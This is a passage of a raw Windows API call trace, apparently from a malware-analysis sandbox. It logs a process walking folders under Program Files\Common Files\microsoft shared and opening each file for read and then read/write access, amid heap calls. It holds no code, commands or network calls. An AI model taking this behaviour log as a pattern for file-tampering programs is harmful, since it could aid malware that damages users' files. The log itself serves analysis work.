dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0088.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0088.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0088.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0088.073] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf83ff0b0, ftCreationTime.dwHighDateTime=0x1d57485, ftLastAccessTime.dwLowDateTime=0x57fc1340, ftLastAccessTime.dwHighDateTime=0x1d592a3, ftLastWriteTime.dwLowDateTime=0x57fc1340, ftLastWriteTime.dwHighDateTime=0x1d592a3, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="omnipos.exe", cAlternateFileName="")) returned 1 [0088.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35070 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0088.074] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78090 [0088.074] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.074] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92bb9e8d, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x92bb9e8d, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0088.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0088.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8afe0 [0088.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0088.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0088.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0088.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0088.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.075] AreFileApisANSI () returned 1 [0088.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun", lpUsedDefaultChar=0x0) returned 58 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0088.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.075] AreFileApisANSI () returned 1 [0088.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0088.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0088.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 58 [0088.075] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.076] GetLastError () returned 0x5 [0088.076] GetLastError () returned 0x5 [0088.076] SetLastError (dwErrCode=0x5) [0088.076] GetLastError () returned 0x5 [0088.076] SetLastError (dwErrCode=0x5) [0088.076] GetLastError () returned 0x5 [0088.076] SetLastError (dwErrCode=0x5) [0088.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0088.076] AreFileApisANSI () returned 1 [0088.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0088.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69e30 [0088.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 58 [0088.076] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.076] GetLastError () returned 0x5 [0088.076] GetLastError () returned 0x5 [0088.076] SetLastError (dwErrCode=0x5) [0088.076] GetLastError () returned 0x5 [0088.076] SetLastError (dwErrCode=0x5) [0088.076] GetLastError () returned 0x5 [0088.076] SetLastError (dwErrCode=0x5) [0088.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0088.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0088.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0088.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0088.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0088.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0088.077] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ink", cAlternateFileName="")) returned 1 [0088.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0088.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0088.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0088.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0088.077] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78490 [0088.078] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92bb9e8d, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x92bb9e8d, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.078] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ea0 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0088.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0088.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0088.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.179] AreFileApisANSI () returned 1 [0088.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 90 [0088.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0088.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.179] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.179] AreFileApisANSI () returned 1 [0088.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0088.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0088.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.180] GetFileType (hFile=0x348) returned 0x1 [0088.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.180] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0088.180] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0088.180] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0088.180] CloseHandle (hObject=0x348) returned 1 [0088.180] AreFileApisANSI () returned 1 [0088.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0088.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0088.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.181] GetFileType (hFile=0x348) returned 0x1 [0088.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.181] CloseHandle (hObject=0x348) returned 1 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 